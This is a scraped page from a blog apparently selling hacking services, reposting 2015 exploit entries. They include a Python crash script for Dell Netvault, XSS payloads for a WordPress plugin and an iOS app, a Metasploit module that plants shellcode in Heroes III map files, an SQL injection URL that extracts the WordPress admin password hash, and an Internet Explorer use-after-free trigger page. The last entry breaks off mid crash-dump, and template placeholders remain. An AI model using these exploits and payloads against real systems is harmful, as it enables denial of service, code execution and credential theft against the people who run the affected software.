Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863153195

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
"""
Product: Dell Netvault Backup
Link: http://software.dell.com/products/netvault-backup/
Vendor: Dell
Vulnerable Version(s): 10.0.1.24 and probably prior
Tested Version: Version 10.0.1.24
Advisory Publication: July 30, 2015 
Vendor Notification: January 9, 2015
Public Disclosure: July 30, 2015
Vulnerability Type: Remote Denial of service
CVE Reference: CVE-2015-5696
Risk Level: Medium
Discovered and Provided: Josep Pi Rodriguez https://es.linkedin.com/pub/josep-pi-rodriguez/60/229/b24

-----------------------------------------------------------------------------------------------

Advisory Details:

Doing reverse engineering of the protocol was found several ways to cause a crash in the nvpmgr.exe process.The entire application (all processes) will die and it won't be able to restart again by itself unless someone do it manually.

Proof of concept script:
"""

#!/usr/bin/python
import socket as so
from struct import *

server = "192.168.140.130"
port = 20031
d = "\x18\x00\x00\x00"  
d += "\x01" 

#d += "\xCB\x22\x77\xC9" # Another crash example
d += "\x18\xE8\xBE\xC8" # Will cause the crash
d += "\x0B\x00\x00\x00" + "AAAA" + "B" * 6  
d += "\x00" # null byte

##
# send it

s = so.socket(so.AF_INET, so.SOCK_STREAM)
s.connect((server, port))
s.send(d)
s.close()

"""
-----------------------------------------------------------------------------------------------

Solution:

Disclosure timeline:
2015-01-09 Vendor notified via email
2015-05-26 Vendor notifies that the issue is fixed in version 10.0.5.x
2015-07-30 Public disclosure.

The fix done by Dell was not checked by the researcher.

-----------------------------------------------------------------------------------------------
"""
HireHackking 
# Exploit Title: OSX Keychain - EXC_BAD_ACCESS
# Date: 22/07/2015
# Exploit Author: Juan Sacco
# Vendor Homepage: https://www.apple.com
# Software Link: https://www.apple.com/en/downloads/
# Version: 9.0 (55161)
# Tested on: OSX Yosemite 10.10.4
# CVE : None

# History - Reported to product-security@apple.com 20 Jul 2015
# Be careful: Crashing the Keychain will affect the user ability to use
Keychain stored passwords.

# How to reproduce it manually
1. Select a certificate, right click "New certificate preference.."
2. Under "Location or Email address:" add random values +9000
3. Click on Add to conduct the PoC manually

# Technically:
Performing @selector(addCertificatePreference:) from sender NSButton
0x608000148cf0

# Exception type
Exception Type:        EXC_BAD_ACCESS (SIGSEGV)
Exception Codes:       KERN_PROTECTION_FAILURE at 0x00007fff4d866828
External Modification Warnings:
VM Regions Near 0x7fff4d866828:
    MALLOC_SMALL           00007f9e7d000000-00007f9e80000000 [ 48.0M]
rw-/rwx SM=PRV
--> STACK GUARD            00007fff4c7de000-00007fff4ffde000 [ 56.0M]
---/rwx SM=NUL  stack guard for thread 0
    Stack                  00007fff4ffde000-00007fff507de000 [ 8192K]
rw-/rwx SM=COW  thread 0

(lldb)
Process 490 resuming
Process 490 stopped

* thread #1: tid = 0x19b7, 0x00007fff92c663c3
Security`SecCertificateSetPreference + 325, queue =
'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2,
address=0x7fff4d866828)

    frame #0: 0x00007fff92c663c3 Security`SecCertificateSetPreference + 325

Security`SecCertificateSetPreference:

->  0x7fff92c663c3 <+325>: callq  0x7fff92cf18b2            ; symbol stub
for: CFStringGetCString
    0x7fff92c663c8 <+330>: movq   %rbx, -0x670(%rbp)
    0x7fff92c663cf <+337>: testb  %al, %al
    0x7fff92c663d1 <+339>: jne    0x7fff92c663d8            ; <+346>

Process:               Keychain Access [598]
Path:                  /Applications/Utilities/Keychain
Access.app/Contents/MacOS/Keychain Access
Identifier:            com.apple.keychainaccess
Version:               9.0 (55161)
Build Info:            KeychainAccess-55161000000000000~620
Code Type:             X86-64 (Native)
Parent Process:        ??? [1]
Responsible:           Keychain Access [598]
User ID:               501

Date/Time:             2015-07-28 13:32:05.183 +0200
OS Version:            Mac OS X 10.10.4 (14E46)
Report Version:        11
Anonymous UUID:        08523B58-1EF8-DC4A-A7D7-CB31074E4395
Crashed Thread:        0  Dispatch queue: com.apple.main-thread

VM Regions Near 0x7fff507776c8:
    MALLOC_SMALL           00007ff93c800000-00007ff93e000000 [ 24.0M]
rw-/rwx SM=PRV
--> STACK GUARD            00007fff4e5d7000-00007fff51dd7000 [ 56.0M]
---/rwx SM=NUL  stack guard for thread 0
    Stack                  00007fff51dd7000-00007fff525d7000 [ 8192K]
rw-/rwx SM=COW  thread 0

  rax: 0x0000000001e5e1a0  rbx: 0x0000000000000006  rcx: 0x0000000008000100
 rdx: 0x0000000001e5e1a0
  rdi: 0x000060000045b6c0  rsi: 0x00007fff507776d0  rbp: 0x00007fff525d5f30
 rsp: 0x00007fff507776d0
   r8: 0x0000000000000000   r9: 0x00007fff79e6a300  r10: 0x00007ff93c019790
 r11: 0x00007fff79147658
  r12: 0x000000000000002d  r13: 0x00007fff507776d0  r14: 0x00007fff525d5880
 r15: 0x00007ff93ae41680
  rip: 0x00007fff901083c3  rfl: 0x0000000000010202  cr2: 0x00007fff507776c8
HireHackking 
Job Manager Persistent XSS

Details
========================================================================================
Product: Job Manager Plugin For Wordpress
Vendor-URL: www.wp-jobmanager.com
CVE-ID: CVE-2015-2321


Credits
========================================================================================
Discovered by: Owais Mehtab


Affected Products:
========================================================================================
Job Manager Plugin <= 0.7.22

Description
========================================================================================
"Job Manager Plugin For Wordpress"

More Details
========================================================================================
A persistent Cross site scripting (XSS) in Job Manager Plugin has been discovered,
the plugin's email field was not sanitized thus the vulnerability can be easily 
exploited and can be used to steal cookies,perform phishing attacks and other various 
attacks compromising the security of a user.

Proof of Concept
========================================================================================
Click on the "send through your résume" and set the below vector in email field

'"><img src=x onerror=prompt(document.cookie);>

Now click on initiate chat 

PoC Video
https://www.dropbox.com/s/i8cuf15hbdf5tmu/jobmanager-xss.mp4
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'zlib'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Heroes of Might and Magic III .h3m Map file Buffer Overflow',
      'Description'    => %q{
          This module embeds an exploit into an ucompressed map file (.h3m) for
        Heroes of Might and Magic III. Once the map is started in-game, a
        buffer overflow occuring when loading object sprite names leads to
        shellcode execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Pierre Lindblad', # Vulnerability discovery
          'John AAkerblom'   # Vulnerability discovery, PoC and Metasploit module
        ],
      'References'     =>
        [
          [ 'EDB', '37716' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'H3 Complete 4.0.0.0  [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]',
            {
              # Two "Anticrash"-gadgets are needed or the game will crash before ret
              #
              # Anticrash1, needs to pass the following code down to final JMP:
              # MOV EAX, DWORD PTR DS : [ESI + 4] ; [Anticrash1 + 4]
              # XOR EBX, EBX
              # CMP EAX, EBX
              # JE SHORT <crash spot> ; JMP to crash if EAX is 0
              # MOV CL, BYTE PTR DS : [EAX - 1]
              # CMP CL, BL
              # JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0
              # CMP CL, 0FF
              # JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF
              # CMP EDI, EBX
              # JNE <good spot> ; JMP to good spot. Always occurs if we get this far
              #
              # Summary: An address which when incremented by 4 and then dereferenced
              # leads to for example a string which is preceeded neither by a 0x00 or 0xFF
              'Anticrash1' => 0x004497D4,
              # Anticrash2, needs to return out of the following call (tricky):
              #
              # MOV EAX, DWORD PTR DS : [ECX] ; [Anticrash2]
              # CALL DWORD PTR DS : [EAX + 4] ; [[Anticrash2] + 4]
              #
              # Summary: An address which when dereferenced leads to an address that
              # when incremented by 4 and then deferenced leads to a function returning
              # without accessing any registers/memory that would cause a crash.
              'Anticrash2' => 0x006A6430,
              'Ret' => 0x004EFF87, # CALL ESP Heroes3.exe
              'Padding' => 121 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
            }
          ],
          [
            'HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]',
            {
              'Anticrash1' => 0x00456A48,
              'Anticrash2' => 0x006A6830,
              'Ret' => 0x00580C0F, # CALL ESP Heroes3 HD.exe
              'Padding' => 121 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
            }
          ],
          [
            'Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]',
            {
              # The two anticrash gadgets are accessed in reverse order for this target,
              # meaning that the documentation above for Anticrash1 applies to Anticrash2
              # here. However, Anticrash1 here is accessed differently than the other targets.
              # Anticrash1, needs to pass the following code:
              # CMP BYTE PTR SS:[EBP+5C], 72 ; [Anticrash1 + 0x5C]
              # JNE 00591F37
              # MOV EAX,DWORD PTR SS:[EBP+38] ; [Anticrash1 + 0x38]
              'Anticrash1' => 0x00580C0F, # Coincidentally the Ret value from HD Mod target
              # Anticrash2, see documentation for Anticrash1 (not 2) in H3 Complete 4.0.0.0 target
              'Anticrash2' => 0x005CE200,
              'Ret' => 0x0043EAB1, # CALL ESP h3demo.exe
              'Padding' => 109, # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
              'CRC32' => 0xFEEFB9EB
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jul 29 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME',
                      [
                        false,
                        'If file exists, exploit will be embedded' \
                          ' into it. If not, a new default h3m file where' \
                          ' it will be embedded will be created.',
                        'sploit.h3m'
                      ])
      ], self.class)
  end

  def exploit
    buf = ''

    # Load h3m into buffer from uncompressed .h3m on disk/default data
    begin
      buf << read_file(datastore['FILENAME'])
      print_status('File ' + datastore['FILENAME'] + ' exists, will embed exploit if possible')
    rescue Errno::ENOENT
      print_warning('File ' + datastore['FILENAME'] + ' does not exist, creating new file from ' \
        'default .h3m data')
      buf << make_default_h3m
    end

    # Find the object attributes array in the file by searching for a sprite name that occurs
    # as the first game object in all maps.
    objects_pos = buf.index('AVWmrnd0.def')
    if objects_pos.nil?
      print_error('Failed to find game object section in file ' + datastore['FILENAME'] + \
        '. Make sure this file is an uncompressed .h3m (and has not yet had exploit embedded)')
      return
    end

    # Entries in the objects array start with a string size followed by game sprite name string
    # Move back 4 bytes from the first sprite name to get to the start of the objects array
    objects_pos -= 4

    print_good('Found object attributes array in file at decimal offset ' + objects_pos.to_s)

    # Construct a malicious object entry with a big size, where the sprite name starts
    # with a NULL terminator and 6 extra 0x00 bytes. The first 2 of those 6 can be anything,
    # but certain values for the last 4 will cause the CALL-ESP gadget address to be overwritten.
    # After the 7 0x00 bytes comes 121 bytes of random data and then the CALL ESP-gadget for
    # overwriting the saved eip. Finally two "anticrash gadgets" that are used by the game before
    # it returns to the CALL ESP-gadget are required for the game not to crash before returning.
    size = 7 + target['Padding'] + 4 + 4 + 4 + payload.encoded.size
    exp = ''
    exp << [size].pack('V')
    exp << "\x00" * 7 # The first byte terminates string, next 2 dont matter, last 4 need to be 0
    exp << rand_text(target['Padding'])
    exp << [target.ret].pack('V')
    exp << [target['Anticrash1']].pack('V')
    exp << [target['Anticrash2']].pack('V')
    exp << payload.encoded

    # Embed malicious object entry. It is okay if we overwrite the rest of the file and extend buf
    from = objects_pos
    to = from + size
    buf[from..to] = exp
    print_good('Embedded exploit between decimal file offsets ' + from.to_s + ' and ' + to.to_s)

    # Demo version has a crc32 check to disallow other maps than the one it comes with.
    if target['CRC32']
      buf = forge_crc32(buf, target['CRC32'])
      if Zlib.crc32(buf) == target['CRC32']
        print_good('Forged CRC32 to 0x%08X by adding 4 bytes at end of file' % target['CRC32'])
      else
        print_error('Failed to forge CRC32')
        return
      end
    end

    # Write the uncompressed exploit .h3m (the game can load uncompressed .h3ms)
    file_create(buf)
  end

  def substring_pos(string, substring)
    string.enum_for(:scan, substring).map { $~.offset(0)[0] }
  end

  #
  # Loads a file
  #
  def read_file(fname)
    buf = ''
    ::File.open(fname, 'rb') do |f|
      buf << f.read
    end

    buf
  end

  #
  # Returns data for a minimimum required S size h3m map containing 2 players
  #
  def make_default_h3m
    buf = ''

    # Set map specifications to 36x36 (0x24000000) map with 2 players, with
    # default/no settings for name, description, victory condition etc
    buf << "\x0e\x00\x00\x00\x01\x24\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    buf << "\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\xff\x01\x01\x00\x01\x00"
    buf << "\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x8c"
    buf << "\x00\x00\xff\x00\x00\x00\x00\xb1\x00\x00\xff\x00\x00\x00\x00\x00"
    buf << "\x00\x00\xff\x00\x00\x00\x00\x7f\x00\x00\xff\x00\x00\x00\x00\x48"
    buf << "\x00\x00\xff\xff\xff\x00"
    buf << "\xFF" * 16
    buf << "\x00" * 35

    # Each tile is 7 bytes, fill map with empty dirt tiles (0x00)
    buf << "\x00" * (36 * 36 * 7)

    # Set object attribute array count to 1
    buf << "\x01\x00\x00\x00"

    # Size of first sprite name, this will be overwritten
    buf << "\x12\x34\x56\x78"

    # Standard name for first object, which will be searched for
    buf << 'AVWmrnd0.def'

    buf
  end

  #
  # Forge crc32 by adding 4 bytes at the end of data
  # http://blog.stalkr.net/2011/03/crc-32-forging.html
  #
  def forge_crc32(data, wanted_crc)
    crc32_reverse = [
      0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
      0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
      0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
      0xB61B38CB, 0x6D6A3E8A, 0xDB883208, 0x00F93449,
      0xDA7A5A9A, 0x010B5CDB, 0xB7E95059, 0x6C985618,
      0x015C4F1C, 0xDA2D495D, 0x6CCF45DF, 0xB7BE439E,
      0xB74777D7, 0x6C367196, 0xDAD47D14, 0x01A57B55,
      0x6C616251, 0xB7106410, 0x01F26892, 0xDA836ED3,
      0x6F85B375, 0xB4F4B534, 0x0216B9B6, 0xD967BFF7,
      0xB4A3A6F3, 0x6FD2A0B2, 0xD930AC30, 0x0241AA71,
      0x02B89E38, 0xD9C99879, 0x6F2B94FB, 0xB45A92BA,
      0xD99E8BBE, 0x02EF8DFF, 0xB40D817D, 0x6F7C873C,
      0xB5FFE9EF, 0x6E8EEFAE, 0xD86CE32C, 0x031DE56D,
      0x6ED9FC69, 0xB5A8FA28, 0x034AF6AA, 0xD83BF0EB,
      0xD8C2C4A2, 0x03B3C2E3, 0xB551CE61, 0x6E20C820,
      0x03E4D124, 0xD895D765, 0x6E77DBE7, 0xB506DDA6,
      0xDF0B66EA, 0x047A60AB, 0xB2986C29, 0x69E96A68,
      0x042D736C, 0xDF5C752D, 0x69BE79AF, 0xB2CF7FEE,
      0xB2364BA7, 0x69474DE6, 0xDFA54164, 0x04D44725,
      0x69105E21, 0xB2615860, 0x048354E2, 0xDFF252A3,
      0x05713C70, 0xDE003A31, 0x68E236B3, 0xB39330F2,
      0xDE5729F6, 0x05262FB7, 0xB3C42335, 0x68B52574,
      0x684C113D, 0xB33D177C, 0x05DF1BFE, 0xDEAE1DBF,
      0xB36A04BB, 0x681B02FA, 0xDEF90E78, 0x05880839,
      0xB08ED59F, 0x6BFFD3DE, 0xDD1DDF5C, 0x066CD91D,
      0x6BA8C019, 0xB0D9C658, 0x063BCADA, 0xDD4ACC9B,
      0xDDB3F8D2, 0x06C2FE93, 0xB020F211, 0x6B51F450,
      0x0695ED54, 0xDDE4EB15, 0x6B06E797, 0xB077E1D6,
      0x6AF48F05, 0xB1858944, 0x076785C6, 0xDC168387,
      0xB1D29A83, 0x6AA39CC2, 0xDC419040, 0x07309601,
      0x07C9A248, 0xDCB8A409, 0x6A5AA88B, 0xB12BAECA,
      0xDCEFB7CE, 0x079EB18F, 0xB17CBD0D, 0x6A0DBB4C,
      0x6567CB95, 0xBE16CDD4, 0x08F4C156, 0xD385C717,
      0xBE41DE13, 0x6530D852, 0xD3D2D4D0, 0x08A3D291,
      0x085AE6D8, 0xD32BE099, 0x65C9EC1B, 0xBEB8EA5A,
      0xD37CF35E, 0x080DF51F, 0xBEEFF99D, 0x659EFFDC,
      0xBF1D910F, 0x646C974E, 0xD28E9BCC, 0x09FF9D8D,
      0x643B8489, 0xBF4A82C8, 0x09A88E4A, 0xD2D9880B,
      0xD220BC42, 0x0951BA03, 0xBFB3B681, 0x64C2B0C0,
      0x0906A9C4, 0xD277AF85, 0x6495A307, 0xBFE4A546,
      0x0AE278E0, 0xD1937EA1, 0x67717223, 0xBC007462,
      0xD1C46D66, 0x0AB56B27, 0xBC5767A5, 0x672661E4,
      0x67DF55AD, 0xBCAE53EC, 0x0A4C5F6E, 0xD13D592F,
      0xBCF9402B, 0x6788466A, 0xD16A4AE8, 0x0A1B4CA9,
      0xD098227A, 0x0BE9243B, 0xBD0B28B9, 0x667A2EF8,
      0x0BBE37FC, 0xD0CF31BD, 0x662D3D3F, 0xBD5C3B7E,
      0xBDA50F37, 0x66D40976, 0xD03605F4, 0x0B4703B5,
      0x66831AB1, 0xBDF21CF0, 0x0B101072, 0xD0611633,
      0xBA6CAD7F, 0x611DAB3E, 0xD7FFA7BC, 0x0C8EA1FD,
      0x614AB8F9, 0xBA3BBEB8, 0x0CD9B23A, 0xD7A8B47B,
      0xD7518032, 0x0C208673, 0xBAC28AF1, 0x61B38CB0,
      0x0C7795B4, 0xD70693F5, 0x61E49F77, 0xBA959936,
      0x6016F7E5, 0xBB67F1A4, 0x0D85FD26, 0xD6F4FB67,
      0xBB30E263, 0x6041E422, 0xD6A3E8A0, 0x0DD2EEE1,
      0x0D2BDAA8, 0xD65ADCE9, 0x60B8D06B, 0xBBC9D62A,
      0xD60DCF2E, 0x0D7CC96F, 0xBB9EC5ED, 0x60EFC3AC,
      0xD5E91E0A, 0x0E98184B, 0xB87A14C9, 0x630B1288,
      0x0ECF0B8C, 0xD5BE0DCD, 0x635C014F, 0xB82D070E,
      0xB8D43347, 0x63A53506, 0xD5473984, 0x0E363FC5,
      0x63F226C1, 0xB8832080, 0x0E612C02, 0xD5102A43,
      0x0F934490, 0xD4E242D1, 0x62004E53, 0xB9714812,
      0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
      0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
      0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
    ]

    # forward calculation of CRC up to pos, sets current forward CRC state
    fwd_crc = 0xffffffff
    data.each_byte do |c|
      fwd_crc = (fwd_crc >> 8) ^ Zlib.crc_table[(fwd_crc ^ c) & 0xff]
    end

    # backward calculation of CRC up to pos, sets wanted backward CRC state
    bkd_crc = wanted_crc ^ 0xffffffff

    # deduce the 4 bytes we need to insert
    [fwd_crc].pack('<L').each_byte.reverse_each do |c|
      bkd_crc = ((bkd_crc << 8) & 0xffffffff) ^ crc32_reverse[bkd_crc >> 24] ^ c
    end

    res = data + [bkd_crc].pack('<L')
    res
  end
end
HireHackking

Printer Pro 5.4.3 IOS - Persistent Cross-Site Scripting

HACKER · %s · %s

Document Title: =============== Printer Pro 5.4.3 IOS - Cross Site Scripting Credits & Authors: ================== TaurusOmar - @TaurusOmar_ (taurusomar13@gmail.com) [taurusomar.blogspot.com] Release Date: ============= 2015-08-11 Product & Service Introduction: =============================== Print attachments, documents, web pages and more right from your iPhone and iPad to any Wi-Fi or USB printer. Printer Pro lets you wirelessly print from the iPhone or iPad. It can print directly to many Wi-Fi printers or any printer attached to your Mac or PC via helper application installed on your computer. Once installed, Printer Pro appears in the "Open In..." list on your device. This lets you print documents from Mail, PDF Expert and many other applications on your iPhone or iPad that support this function. (Copy of the Vendor Homepage: https://itunes.apple.com/us/app/printer-pro-print-documents/id393313223?mt=8) Abstract Advisory Information: ============================== An independent Vulnerability Laboratory researcher discovered multiple vulnerabilities in the official aplication Printer Pro 5.4.3. Vulnerability Disclosure Timeline: ================================== 2015-08-11: Public Disclosure Discovery Status: ================= Published Affected Product(s): ==================== Readdle Product: Printer Pro 5.4.3 - iOS Mobile Application Exploitation Technique: ======================= Local Severity Level: =============== Low Technical Details & Description: ================================ An application-side input validation vulnerability has been discovered in the officialPrinter Pro 5.4.3 iOS mobile application. The vulnerability allows a local attacker to inject own script code as payload to the application-side of the vulnerable service function or module. The vulnerability exists in the TextBox Name contacts in which injects the code is activated When the application is opened and the contact containing the script selects to print Request Method(s): [+] Import Vulnerable Module(s): [+] Add Contact Vulnerable Parameter(s): [+] TextBox Name Vulnerable Final(s): [+] Print Contact Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by local attackers with system user account and without . For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. 1. Install the ios application ( https://itunes.apple.com/us/app/printer-pro-print-documents/id393313223?mt=8) 2. Add new Contact with script in the TexBox Name 2. Start the app and open the import function 3. Select contact that contains the script 4. Successful reproduce of the persistent vulnerability! Proof of Concept (IMAGES): 1. http://i.imgur.com/yku1o1c.jpg 2. http://i.imgur.com/Q5O3X15.jpg 3. http://i.imgur.com/uPhL9Ow.jpg PoC: Cross Site Scripting <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object> Security Risk: ============== The security risk of the persistent input validation vulnerability in the name value is estimated as medium. (CVSS 3.7)
HireHackking

WordPress Plugin Video Gallery 2.7 - SQL Injection

HACKER · %s · %s

# Exploit Title: WordPress Video Gallery 2.7 SQL Injection # Date: 20-01-2015 # Software Link: https://wordpress.org/plugins/contus-video-gallery/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps 1. Description $_GET['vid'] is not escaped. google_adsense() is accessible for everyone. File: contus-video-gallery\hdflvvideoshare.php add_action('wp_ajax_googleadsense' ,'google_adsense'); add_action('wp_ajax_nonpriv_googleadsense' ,'google_adsense'); function google_adsense(){ global $wpdb; $vid = $_GET['vid']; $google_adsense_id = $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid); $query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id); $google_adsense = unserialize($query); echo $google_adsense['googleadsense_code']; die(); } http://security.szurek.pl/wordpress-video-gallery-27-sql-injection.html 2. Proof of Concept http://wordpress-url/wp-admin/admin-ajax.php?action=googleadsense&vid=0 UNION SELECT CAST(CHAR(48, 32, 85, 78, 73, 79, 78, 32, 83, 69, 76, 69, 67, 84, 32, 67, 79, 78, 67, 65, 84, 40, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 57, 55, 44, 32, 53, 56, 44, 32, 52, 57, 44, 32, 53, 56, 44, 32, 49, 50, 51, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 57, 44, 32, 53, 54, 44, 32, 53, 56, 44, 32, 51, 52, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 49, 49, 49, 44, 32, 49, 48, 51, 44, 32, 49, 48, 56, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 53, 44, 32, 49, 48, 49, 44, 32, 57, 53, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 48, 44, 32, 49, 48, 49, 44, 32, 51, 52, 44, 32, 53, 57, 44, 32, 49, 49, 53, 44, 32, 53, 56, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 44, 32, 76, 69, 78, 71, 84, 72, 40, 117, 115, 101, 114, 95, 112, 97, 115, 115, 41, 44, 32, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 53, 56, 44, 32, 51, 52, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 44, 32, 117, 115, 101, 114, 95, 112, 97, 115, 115, 44, 32, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 51, 52, 44, 32, 53, 57, 44, 32, 49, 50, 53, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 41, 32, 70, 82, 79, 77, 32, 119, 112, 95, 117, 115, 101, 114, 115, 32, 87, 72, 69, 82, 69, 32, 73, 68, 32, 61, 32, 49) as CHAR) 3. Solution: Update to version 2.8
HireHackking

Havij Pro - Crash (PoC)

HACKER · %s · %s

#!/usr/bin/env python #Exploit Title:Havij Pro Crash POC # Tested:windows7 #Sofrware Link:http://www.itsecteam.com/ #Version:1.17 #Email:i_7e1@outlook.com #Author:M1x7e1@Safeye Team #run python poc.py #copy content to target #click Analyze ## EDB-Note: tested and verified using version 1.6 Pro content = “\x41” * 8000 file = open(“xx.txt”,”w”) file.write(content) file.close()
HireHackking
<!-- Blue Frost Security GmbH https://www.bluefrostsecurity.de/ research(at)bluefrostsecurity.de BFS-SA-2015-001 12-August-2015 ________________________________________________________________________________ Vendor: Microsoft, http://www.microsoft.com Affected Products: Internet Explorer Affected Version: IE 8-11 Vulnerability: CTreeNode::GetCascadedLang Use-After-Free Vulnerability CVE ID: CVE-2015-2444 ________________________________________________________________________________ I. Impact If an attacker succeeds in bypassing the Memory Protector and Isolated Heap protection mechanisms this vulnerability allows the execution of arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. ________________________________________________________________________________ II. Vulnerability Details Microsoft Internet Explorer 11 is prone to a use-after-free vulnerability in the MSHTML!CTreeNode::GetCascadedLang function. The following analysis was performed on Internet Explorer 11 on Windows 8.1 (x64). The following HTML page demonstrates the problem: --> <!DOCTYPE HTML> <html> <meta http-equiv="X-UA-Compatible" content="IE=10" /> <script> function Trigger() { for(i=0; i < document.getElementsByTagName("meter").length; i++) { document.getElementsByTagName("meter")[i].innerText = "a"; } } function reload() { location.reload(); } setTimeout("reload()", 1000); </script> <button><label><style>label{}</style><form> <meter>label<optgroup><meter>fieldset<script>Trigger();</script></meter> <select></select><button></button><form><form> <input><script>Trigger();</script> <form><style>form{-ms-behavior: url("c");}</style></form> </html> <!-- With page heap enabled, visiting that page results in the following crash: (7c0.408): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\MSHTML.dll - eax=00000000 ebx=12698fa0 ecx=0000ffff edx=00000100 esi=00000000 edi=12696fb8 eip=6fea5a44 esp=0a75ba18 ebp=0a75ba38 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 MSHTML!CreateCoreWebView+0x1e0234: 6fea5a44 81b828030000506ffb6f cmp dword ptr [eax+328h],offset MSHTML!CreateCoreWebView+0x2f1740 (6ffb6f50) ds:002b:00000328=???????? 0:005> ub MSHTML!CTreeNode::GetCascadedLang+0x5f: 6fea5a2b 8945f8 mov dword ptr [ebp-8],eax 6fea5a2e 8945f0 mov dword ptr [ebp-10h],eax 6fea5a31 8b4710 mov eax,dword ptr [edi+10h] 6fea5a34 85c0 test eax,eax 6fea5a36 740a je MSHTML!CTreeNode::GetCascadedLang+0x76 (6fea5a42) 6fea5a38 f6400c04 test byte ptr [eax+0Ch],4 6fea5a3c 0f859a020000 jne MSHTML!CTreeNode::GetCascadedLang+0x30f (6fea5cdc) 6fea5a42 8b07 mov eax,dword ptr [edi] 0:005> !heap -p -a edi+10 address 12696fc8 found in _DPH_HEAP_ROOT @ a961000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) a9646e8: 12696fb8 48 - 12696000 2000 71e694ec verifier!AVrfDebugPageHeapAllocate+0x0000023c 779057b7 ntdll!RtlDebugAllocateHeap+0x0000003c 778a77ce ntdll!RtlpAllocateHeap+0x0004665a 77861134 ntdll!RtlAllocateHeap+0x0000014d 6fa31dd5 MSHTML!CLabelElement::CreateElement+0x00000015 6f8a5b4d MSHTML!CreateElement+0x00000084 6fa14768 MSHTML!CInBodyInsertionMode::DefaultStartElementHandler+0x00000078 6f91d6eb MSHTML!CInsertionMode::HandleStartElementToken+0x0000003d 6f91d3a3 MSHTML!CHtml5TreeConstructor::HandleElementTokenInInsertionMode+0x00000026 6f91d338 MSHTML!CHtml5TreeConstructor::PushElementToken+0x000000a5 6f91d1cc MSHTML!CHtml5Tokenizer::TagName_StateHandler+0x0000028c 6f91ab35 MSHTML!CHtml5Tokenizer::ParseBuffer+0x0000012c 6f91ae09 MSHTML!CHtml5Parse::ParseToken+0x00000131 6f91a377 MSHTML!CHtmPost::ProcessTokens+0x000006af 6f914952 MSHTML!CHtmPost::Exec+0x000001e4 6f991118 MSHTML!CHtmPost::Run+0x0000003d 6f99107e MSHTML!PostManExecute+0x00000061 6f9994a2 MSHTML!PostManResume+0x0000007b 6f9b04f7 MSHTML!CDwnChan::OnMethodCall+0x0000003e 6f7fd865 MSHTML!GlobalWndOnMethodCall+0x0000016d 6f7fd18a MSHTML!GlobalWndProc+0x000002e5 75a68e71 user32!_InternalCallWinProc+0x0000002b 75a690d1 user32!UserCallWinProcCheckWow+0x0000018e 75a6a66f user32!DispatchMessageWorker+0x00000208 75a6a6e0 user32!DispatchMessageW+0x00000010 710600d8 